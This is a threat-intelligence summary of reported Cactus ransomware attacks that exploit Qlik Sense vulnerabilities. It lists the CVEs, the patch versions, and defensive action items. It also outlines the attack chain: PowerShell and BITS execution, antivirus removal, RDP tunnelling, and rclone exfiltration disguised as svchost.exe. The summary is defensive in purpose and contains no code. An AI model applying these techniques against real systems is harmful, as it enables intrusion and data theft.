November 30, 2023 at 02:06PM
Cactus ransomware targets Qlik Sense analytics platform vulnerabilities for network access, exploiting unpatched systems to gain control, download tools, and deploy ransomware. Updates have been released to address critical flaws; users are advised to install designated patches. Arctic Wolf reports Cactus uses advanced techniques for persistence, lateral movement, and data exfiltration.
Meeting Takeaways:
1. **Cactus Ransomware Exploits**: The Cactus ransomware is actively exploiting critical vulnerabilities in the Qlik Sense data analytics platform to gain initial access to corporate networks.
2. **Qlik Sense Vulnerability Details**:
– Vulnerabilities were found in the Windows version of Qlik Sense.
– The path traversal bug, CVE-2023-41266, allows for anonymous sessions and unauthorized HTTP requests.
– Another critical vulnerability, CVE-2023-41265 (criticality 9.8), enables privilege escalation and backend server HTTP requests without authentication. This was inadequately fixed and reissued as CVE-2023-48365.
3. **Ransomware Attack Methodology**:
– Code execution through Qlik Sense Scheduler service using PowerShell and BITS.
– Downloading of persistence tools and remote access tools, disguising them as legitimate files.
– Attack patterns include uninstalling antivirus, altering admin passwords, and RDP tunneling for concealment and lateral movement.
– Deployment of the Cactus ransomware in the final attack stage.
4. **Tools and Techniques Observed**:
– Execution of discovery commands output to .TTF files.
– Lateral movement via RDP, disk space analysis via WizTree, and data exfiltration using rclone disguised as ‘svchost.exe’.
– Consistency with previous Cactus ransomware attacks.
5. **Mitigation Recommendations by Qlik**:
– Upgrading Qlik Sense Enterprise for Windows to one of the following patch versions: August 2023 Patch 2, May 2023 Patch 6, February 2023 Patch 10, November 2022 Patch 12, August 2022 Patch 14, May 2022 Patch 16, February 2022 Patch 15, November 2021 Patch 17.
6. **Background on Cactus Ransomware**:
– Emergence in March with a double-extortion approach: data theft followed by encryption.
– Prior exploitation of Fortinet VPN vulnerabilities for network access.
– Kroll researchers note the ransomware’s encryption to avoid detection by security products and tactics such as using AnyDesk, rclone, and batch scripts to disable security measures.
**Action Items**:
– Immediately check if current Qlik Sense installations have been updated to the recommended patches to avoid vulnerability to Cactus ransomware.
– Review and enhance monitoring for the tools and techniques used by the Cactus ransomware, including unusual PowerShell, BITS activity, and exfiltration attempts.
– Consider informing the cybersecurity team about the report from Arctic Wolf and ensuring that network defenses can detect and prevent such ransomware tactics.